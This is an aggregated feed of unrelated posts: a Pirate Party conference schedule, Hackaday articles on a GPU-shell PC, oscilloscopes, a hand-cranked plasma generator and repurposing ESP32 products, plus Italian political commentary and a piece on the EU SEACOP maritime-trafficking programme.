1:45pm – 2:30pmRoad to Town MeetingKolby Blehm
2:30pm – 3:00pmCandidate TutorialJames O’Keefe
3:00pm – 3:45pmElection planning for 2026
3:45pm – 4:00pmClosing Address
4:00pm – 5:00pmClean up

Conference Sessions

Policy and Platform Discussion

We will start by presenting a summary of the party’s current policy positions. From there we will discuss what positions/policy areas we should add. The goal is not to engage in lengthy policy debates, but to identify any gaps in the current platform, prioritize those issues we need to review and adopt positions on. Each individual policy is important, but our platform should be greater than the sum of its parts, a coherent and convincing argument for the party.

Monopoly Free Capitalism

Wendy Welsh will suggest ideas to increase business competition.

Lunch and protecting your privacy hands on

While eating, people knowledgeable in privacy will give hands on tutorials for tech like signal or tor.

How to navigate your local government

Steve Revilak, a Pirate town meeting member in Arlington and our First Officer, discusses how town government works and how you can bring change to yours.

Review of Party Initiatives

First we will outline each of the party’s efforts, assessing their isolated efficacy, as well as their role in accomplishing the party’s overall goals. We will discuss areas we should improve and what changes we need to make. Finally, we will make plans for the next year, including how to gauge the success of our projects.

Road to Town Meeting

Kolby Blehm will discuss his community education program, currently titled “Road to Town
Meeting”, which aims to educate his town on the year long cycle of town government culminating in voting together at town meeting and resetting with elections each year.

Candidate Tutorial

Captain James will give a quick intro to running for office.

Election planning for 2026

We will discuss the races we currently know we are running in for the upcoming year, as well those we might compete in. We will discuss candidate recruitment, voter outreach efforts, and overall strategy.

Registration

The conference is free, but we request that participants register in advance. We encourage attendees to mask to protect everyone’s health. We will have masks and COVID tests for attendees as well as air purifiers. We plan to live stream it for people who cannot attend in person.

The Site

Arts at the Armory is wheelchair accessible, has free parking in the back, is on the Route 88 and 90 bus lines and walking distance from the Gilman and Magoun Squares MBTA Green Line stations. The Lavender Room is in the basement and is accessible by stair and elevator.

Spread the Word!

Share our Facebook event or post up our conference flyer.

If you want to come up with a better version of the filer, email us and we will send you the editable Scribus document. Scribus is a libre desktop publishing application similar to In Design, PageMaker or QuarkXPress. If you want to create your own in another desktop publishing application, the original images are at:

Want to Help?

If you can help with the conference, please take a look at our conference pirate pad and put your name down for anything you will do.

Thanks to our friends at Agaric for hosting Community Bridge.


masspirates.org/blog/2025/06/1…



Using a Videocard as a Computer Enclosure



The CherryTree-modded card next to the original RTX 2070 GPU. (Credit: Gamers Nexus)
In the olden days of the 1990s and early 2000s, PCs were big and videocards were small-ish add-in boards that blended in with other ISA, PCI and AGP cards. These days, however, videocards are big and computers are increasingly smaller. That’s why US-based CherryTree Computers did what everyone has been joking about, and installed a PC inside a GPU, with [Gamers Nexus] having the honors of poking at the creatively titled GeeFarce 5027POS Micro Computer.

As CherryTree describes it on their website, this one-off build was the result of a joke about how GPUs nowadays are more expensive than the rest of the PC combined. Thus they did what any reasonable person would do and put an Asus NUC 13 with a 13th gen Core i7, 64 GB of and 2 TB of NVMe storage inside an (already dead) Asus Aorus RTX 2070 GPU.

In the [Gamers Nexus] video we can see that it’s definitely a quick-and-dirty build, with plenty of heatshrink and wires running everywhere in addition to the chopped off original heatsink. That said, from a few meter away it still looks like a GPU, can be installed like a GPU (but the PCIe connector does nothing) and is in the end a NUC PC inside a GPU shell that you can put a couple of inside a PC case.

Presumably the next project we’ll see in this vein will see a full-blown x86 system grafted inside a still functioning GPU, which would truly make the ‘install the PC inside the GPU’ meme a reality.

youtube.com/embed/wAmu_HnQAo8?…


hackaday.com/2025/06/10/using-…



Dalla Newsletter di Haaretz


The U.K., Canada, Australia, New Zealand and Norway announced that they are imposing sanctions on Israeli ministers Itamar Ben-Gvir and Bezalel Smotrich, for inciting violence against Palestinians in the West Bank." In a joint statement, the five countries charged Ben-Gvir and Smotrich with inciting "extremist violence and serious abuses of Palestinian human rights."

The statement added that "the Israeli Government must uphold its obligations under international law, and we call on it to take meaningful action to end extremist, violent and expansionist rhetoric."

reshared this



In risposta al "Wilson" di oggi


Per chi non lo conoscesse, "Wilson" è il nuovo podcast di Francesco Costa, direttore del Post.

Nel numero di oggi Francesco Costa ha fatto alcune osservazioni, in parte condivisibili in parte no, per spiegare l'esito dei referendum.

A scanso di equivoci, premetto che per me che milito nella CGIL da quasi 15 anni questo referendum è stato una sconfitta tremenda. Non c'è nessun bicchiere mezzo pieno da guardare, c'è solo un bicchiere vuotissimo. Chi sta cercando di vedere la parte mezza piena del bicchiere (il mondo politico) si sta cimentando in un'opera ammirevole di free climbing sugli specchi che però mi sembra non avere alcuna consistenza sul piano dei contenuti.

Il segretario Landini ha affermato "Non abbiamo raggiunto il quorum. Non è una vittoria" che se da un lato non rende affatto l'idea di quanto sia stata una sconfitta pesante per tutti noi che ci abbiamo sperato e abbiamo lavorato per la sua riuscita, almeno ha il pregio di non attirare il ridicolo sui militanti della sua organizzazione. Ai militanti del PD non è andata altrettanto bene, e me ne dispiace; la ridicolaggine di certe affermazioni dei loro leader va ben oltre il giustificabile.

Per tornare al podcast, mi ha colpito innanzitutto la sicurezza con cui Francesco Costa ha individuato tutti i punti per cui, a suo parere, il referendum non doveva essere fatto, tutti i motivi che facevano capire fin dall'inizio che sarebbe andata male. Come scrivevo sopra, in parte concordo con le sue osservazioni, mi domando solo perché abbia aspettato il "dopo" per snocciolare le ragioni del fallimento e non l'abbia fatto prima. Mi è sembrato un tango ballato sulle note del senno di poi.

Ho anche riascoltato l'evergreen sulla "difficoltà dei quesiti", a suo dire troppo tecnici. Siamo un paese ben strano se ancora non abbiamo capito che un parere sul quesito non ce lo possiamo fare dentro la cabina, il giorno dei referendum, leggendo il testo sulla scheda, perché neanche il presidente dell'ordine degli avvocati ce la farebbe a raccapezzarsi tra quelle proposte di cancellare una parola sì e una no in leggi che rimandano ad altre leggi che rimandano ad altre leggi ancora. Il quesito lo si deve capire prima e altrove, nelle settimane che precedono il voto e sui giornali. Il Post ad esempio ha fatto diversi ottimi articoli e podcast sugli argomenti oggetto del referendum. Chi voleva capire di cosa si stava parlando lo poteva fare abbastanza facilmente informandosi al solito modo, leggendo e ascoltanto chi ne scriveva e ne parlava, non credo siamo un paese con bisogni educativi speciali.

E poi mi hanno colpito le assenze, quei temi che non ha toccato neanche di striscio. Provo a buttarne giù un paio.

Davvero non c'è nulla da dire sul fatto che venga indetta una consultazione e che il 70% dei votanti preferisca non andare a votare? Basta accennare, come è stato fatto nel podcast, al fatto che questi sono gli anni con il più gran numero di occupati a tempo indeterminato, che il problema dei licenziamenti non è sentito e che invece la gente si preoccupa dei salari che non crescono? Ma lo sa Francesco Costa quali sono le percentuali di metalmeccanici che partecipano agli scioperi per il rinnovo del loro contratto (quindi per il problema dei salari che non crescono)? Beh, nella mia azienda (150 impiegati) sono circa il 4%. Dov'è tutta questa gente che non si preoccupa dei licenziamenti e che vorrebbe invece occuparsi dei salari? A me sembra il solito "benaltrismo", quell'invenzione cognitiva in virtù della quale qualsiasi sia il problema c'è sempre un ottimo motivo per non occuparsene.

E ancora, è accettabile che in una consultazione referendaria il comportamento di chi non ha nulla da dire conti più di quello di chi invece ce l'ha qualcosa da dire? Possiamo aprire un dibattito sulla ragione per cui ci debba essere un quorum ai referendum abrogativi? Magari chi ritiene che il quorum sia utile ci potrebbe spiegare perché è utile solo sui referendum abrogativi e non, ad esempio, sui referendum costituzionali.

Perché ad un referendum sull'abolizione dell'articolo più insulso di una legge sulla materia più insulsa viene richiesto di garantire, tramite il raggiungimento di un quorum, che la decisione non sia presa da una minoranza di persone mentre ad un referendum costituzionale per l'approvazione di una riforma che sostituisse la Repubblica con la Monarchia, la Magistratura con le telefonate da casa e togliesse il diritto di voto a chi ha il cognome che inizia con "P" non verrebbe richiesto alcun quorum ma basterebbe il voto di una sola persona per procedere alla suddetta modifica?

E insomma, già perdere fa male, se poi bisogna anche elaborare il lutto con questi contributi del Post... sem a post!

#ilPost #referendum #CGIL



questo è matto da legare... ve lo dico io. matto e pericoloso. ha intenzione di invadere se stesso praticamente... l'esercito americano che invade gli stati uniti.


LOTTA AL TRAFFICO ILLECITO MARITTIMO. L’ESPERIENZA DEL PROGRAMMA SEACOP


La cooperazione internazionale è fondamentale nel contrasto ai traffici illeciti marittimi per diversi motivi: la natura transnazionale dei traffici: le rotte del traffico illecito (droga, armi, esseri umani, legname, ecc.) attraversano più giurisdizioni. Nessun Paese può affrontare efficacemente il problema da solo.La condivisione di informazioni e intelligence: la cooperazione consente lo scambio tempestivo di dati tra forze dell’ordine, dogane e autorità marittime. La standardizzazione delle procedure: operare con protocolli comuni facilita le operazioni congiunte e migliora l’efficacia dei controlli. La formazione e rafforzamento delle capacità: i Paesi con meno risorse possono beneficiare del supporto tecnico e formativo di partner più esperti. La risposta coordinata: le operazioni congiunte permettono di colpire simultaneamente più nodi della rete criminale.

### Il progetto SEACOP dell’Unione Europea

Il SEACOP (Seaport Cooperation Project) è un’iniziativa finanziata dall’Unione Europea, giunta alla sua sesta fase (SEACOP VI), che mira a rafforzare la cooperazione internazionale nella lotta contro il traffico illecito via mare.
Obiettivo principale è contrastare il traffico di droga e altri traffici illeciti (come il legname) attraverso il rafforzamento delle capacità operative e di intelligence nei porti di Africa, America Latina e Caraibi.
Le attività principali consistono nella creazione e supporto di Unità di Intelligence Marittima (MIUs) e Unità di Controllo Marittimo Congiunto (JMCUs); nella formazione di agenti locali su tecniche di ispezione, profilazione dei rischi e cooperazione internazionale; nella promozione della condivisione in tempo reale delle informazioni tra Paesi partner e agenzie europee come FRONTEX, MAOC-N, e le forze dell’ordine nazionali.

In sintesi, SEACOP rappresenta un esempio concreto di come la cooperazione internazionale possa tradursi in azioni operative efficaci contro le reti criminali transnazionali, contribuendo alla sicurezza globale e allo sviluppo sostenibile delle regioni coinvolte.

### SEACOP ed i Paesi del Caribe

Grazie a SEACOP, 13 paesi del Caribe hanno potuto aumentare la loro capacità di risposta ai pericoli marittimi, con oltre 120 sequestri di merci illecite e miglioramento della coordinazione nazionale e regionale.

Il progetto si basa su un approccio decentralizzato e rispondente alle esigenze della regione, formando “equipaggiamenti virtuali”, inter-agenzie che possono rispondere ai pericoli in modo rapido e efficace. In 10 anni, SEACOP ha formato oltre 750 ufficiali e ha migliorato la capacità di risposta dei paesi del Caribe ai pericoli marittimi.

### SEACOP VI


Il progetto SEACOP VI mira a combattere il traffico di stupefacenti e le reti criminali associate in America Latina, Caraibi e Africa Occidentale. L’obiettivo principale è interrompere i flussi illeciti e rafforzare la cooperazione tra le autorità responsabili della sicurezza dei confini e della lotta al crimine organizzato. Il progetto si concentra su tre obiettivi principali: rafforzare le capacità di analisi e identificazione di navi sospette, rinforzare le capacità di ricerca e intercettazione di merci illecite e migliorare la cooperazione e la condivisione di informazioni a livello regionale e transregionale.

Il progetto SEACOP VI è il sesto fase del progetto Seaport Cooperation e si concentra su una gamma più ampia di attività illecite, compresa la criminalità ambientale e i flussi illeciti transatlantici. Il progetto si avvale dell’esperienza di diverse agenzie europee e lavora in stretta collaborazione con le autorità locali per combattere il crimine organizzato e garantire la sicurezza dei confini.

### I principali successi di SEACOP

Operazione GRES-Atlantico-SUR (giugno-luglio 2024)
Questa iniziativa, nata nell’ambito di SEACOP, ha coinvolto Argentina, Brasile, Uruguay, Paraguay e Senegal e ha ottenuto risultati straordinari in appena un mese: oltre 5 tonnellate di cocaina sequestrate (4 tonnellate in Paraguay, 800 kg in Argentina, 380 kg in Brasile, 1 tonnellata di marijuana sequestrata in Paraguay, più di 10 arresti in operazioni coordinate, controlli su oltre 15 navi e container marittimi, numerosi controlli aerei e nei porti strategici come Santos (Brasile), Montevideo (Uruguay), Dakar (Senegal) e Asunción (Paraguay).
L’operazione ha dimostrato l’efficacia della condivisione di intelligence marittima e fluviale. Ha portato alla creazione di centri di coordinamento operativo in Argentina e Senegal. È in fase di espansione con il progetto GRES-Ports, che mira a rafforzare i controlli nei principali porti del Pacifico e dei Caraibi.
Il successo è stato possibile grazie alla collaborazione con: EMPACT (piattaforma europea contro le minacce criminali), MAOC-N (Centro di analisi e operazioni marittime), Progetto COLIBRI, EUROFRONT, e la Rete Iberoamericana dei Procuratori Antidroga (RFAI).
Questi risultati mostrano come SEACOP stia evolvendo da un progetto di formazione e capacity building a una rete operativa internazionale capace di colpire duramente le reti criminali transnazionali.


#SEACOP #UNIONEEUROPEA #UE #EU

@Politica interna, europea e internazionale



Two Bits, Four Bits, a Twelve-bit Oscilloscope


Until recently, hobby-grade digital oscilloscopes were mostly, at most, 8-bit sampling. However, newer devices offer 12-bit conversion. Does it matter? Depends. [Kiss Analog] shows where a 12-bit scope may outperform an 8-bit one.

It may seem obvious, of course. When you store data in 8-bit resolution and zoom in on it, you simply have less resolution. However, seeing the difference on real data is enlightening.

To perform the test, he used three scopes to freeze on a fairly benign wave. Then he cranked up the vertical scale and zoomed in horizontally. The 8-bit scopes reveal a jagged line where the digitizer is off randomly by a bit or so. The 12-bit was able to zoom in on a smooth waveform.

Of course, if you set the scope to zoom in in real time, you don’t have that problem as much, because you divide a smaller range by 256 (the number of slices in 8 bits). However, if you have that once-in-a-blue-moon waveform captured, you might appreciate not having to try to capture it again with different settings.

A scope doesn’t have to be physically large to do a 12-bit sample. Digital sampling for scopes has come a long way.

youtube.com/embed/jHYlL08O5IQ?…


hackaday.com/2025/06/10/two-bi…



#USA-#Iran, diplomazia al limite


altrenotizie.org/spalla/10705-…


Nell'ambito della sua visita ufficiale in Montenegro, il Ministro Giuseppe Valditara, ha incontrato oggi il Ministro dell'Istruzione, della Scienza e dell'Innovazione del Montenegro, Anđela Jakšić-Stojanović.


Generating Plasma with a Hand-Cranked Generator


Everyone loves to play with electricity and plasma, and [Hyperspace Pirate] is no exception. Inspired by a couple of 40×20 N52 neodymium magnets he had kicking around, he decided to put together a hand-cranked generator and use it to generate plasma with. Because that’s the kind of fun afternoon projects that enrich our lives, and who doesn’t want some Premium Fire™ to enrich their lives?

The generator itself is mostly 3D printed, with the magnets producing current in eight copper coils as they spin past. Courtesy of the 4.5:1 gear on the crank side, it actually spins at over 1,000 RPM with fairly low effort when unloaded, albeit due to the omission of iron cores in the coils. This due to otherwise the very strong magnets likely cogging the generator to the point where starting to turn it by hand would become practically impossible.

Despite this, the generator produces over a kilovolt with the 14,700 turns of 38 AWG copper wire, which is enough for the voltage multiplier and electrodes in the vacuum chamber, which were laid out as follows:
Circuit for the plasma-generating circuit with a vacuum chamber & hand-cranked generator. (Credit: Hyperspace Pirate, YouTube)Circuit for the plasma-generating circuit with a vacuum chamber & hand-cranked generator. (Credit: Hyperspace Pirate, YouTube)
Some of our esteemed readers may be reminded of arc lighters which are all the rage these days, and this is basically the hand-cranked, up-scaled version of that. Aside from the benefits of having a portable super-arc lighter that doesn’t require batteries, the generator part could be useful in general for survival situations. Outside of a vacuum chamber the voltage required to ionize the air becomes higher, but since you generally don’t need a multi-centimeter arc to ignite some tinder, this contraption should be more than sufficient to light things on fire, as well as any stray neon signs you may come across.

If you’re looking for an easier way to provide some high-voltage excitement, automotive ignition coils can be pushed into service with little more than a 555 timer, and if you can get your hands on a flyback transformer from a CRT, firing them up is even easier.

youtube.com/embed/CLX_pQbSFFg?…


hackaday.com/2025/06/10/genera…



Supercon 2024: Repurposing ESP32 Based Commercial Products


It’s easy to think of commercial products as black boxes, built with proprietary hardware that’s locked down from the factory. However, that’s not always the case. A great many companies are now turning out commercial products that rely on the very same microcontrollers that hackers and makers use on the regular, making them far more accessible for the end user to peek inside and poke around a bit.

Jim Scarletta has been doing just that with a wide variety of off-the-shelf gear. He came down to the 2024 Hackaday Superconference to tell us all about how you can repurpose ESP32-based commercial products.

Drop It Like It’s Hot


youtube.com/embed/2GC19HOr6AI?…

Jim starts off this talk by explaining just why the ESP32 is so popular. Long story short, it’s a powerful and highly capable microcontroller that can talk WiFi and Bluetooth out of the box and costs just a few bucks even in small quantities. That makes it the perfect platform for all kinds of modern hardware that might want to interact with smartphones, the Internet, or home networks at some point or other. It’s even got hardware accelerated cryptography built-in. It’s essentially a one-stop shop for building something connected.
Jim notes that while some commercial ESP32-based products are easy to disassemble and work with, others can be much harder to get into. He had particular trouble with some variants of a smartbulb that differed inside from what he’d expected.
You might ask why you’d want to repurpose a commercial product that has an ESP32 in it, when even fully-built devboards are relatively cheap. “It’s fun!” explains Jim. Beyond that, he notes there are other reasons, too.

You might like re-configuring a commercial product that doesn’t quite do what you want, or you might want to restore functionality to a device that has been deactivated or is no longer supported by its original manufacturer. You can even take a device with known security vulnerabilities and patch them or rebuild them with a firmware that isn’t so horridly dangerous.

It’s also a great way to reuse hardware and stop it becoming e-waste. Commercial hardware often comes with great enclosures, knobs, buttons, and screens that are far nicer than what most of us can whip up in our home labs. Repurposing a commercial product to do something else can be a really neat way to build a polished project.
While we often think of Apple’s ecosystem as a closed shop, Jim explains that you can actually get ESP32 hardware hooked up with HomeKit if you know what you’re doing.
Jim then explains how best to pursue your goal of repurposing a commercial product based on the ESP32. He suggests starting with an ESP32 devboard to learn the platform and how it works. He also recommends researching the product’s specifications so you can figure out what it’s got and how it all works.

Once you’ve got into the thing, you can start experimenting to create your hacked prototype device, but there’s one more thing he reckons you should be thinking about. It’s important to have a security plan from the beginning. If you’re building a connected device, you need to make sure you’re not putting something vulnerable on your home network that could leave you exposed.

You also need to think about physical safety. A lot of ESP32 devices run on mains power—smart bulbs, appliances, and the like. You need to know what you’re doing and observe the proper safety precautions before you go tinkering with anything that plugs into the hot wires coming out of the wall. It’s outside the scope of Jim’s talk to cover this in detail, but you’re well advised to do the reading and learn from those more experienced before you get involved with mains-powered gear.
Jim uses the Shelly as a great example of a commercial ESP32-based product. Credit: via eBay
The rest of Jim’s talk covers the practical details of working with the ESP32. He notes that it’s important to think about GPIO pin statuses at startup, and to ensure you’re not mixing up 5 V and 3.3 V signals, which is an easy way to release some of that precious Magic Smoke.

He also outlines the value of using tools like QEMU and Wokwi for emulation, in addition to having a simple devboard for development purposes. He explores a wide range of other topics that may be relevant to your hacking journey—using JTAG for debugging, working with Apple HomeKit, and even the basics of working with SSL and cryptography. And, naturally, he shows off some real ESP32-based products that you can go out and buy and start tinkering with right away!

Jim’s talk was one of the longer ones, and absolutely jam packed with information at that. No surprise given the topic is such a rich one. We’re blessed these days that companies are turning out all sorts of hackable devices using the popular ESP32 at their heart. They’re ripe for all kinds of tinkering; you just need to be willing to dive in, poke around, and do what you want with them!


hackaday.com/2025/06/10/superc…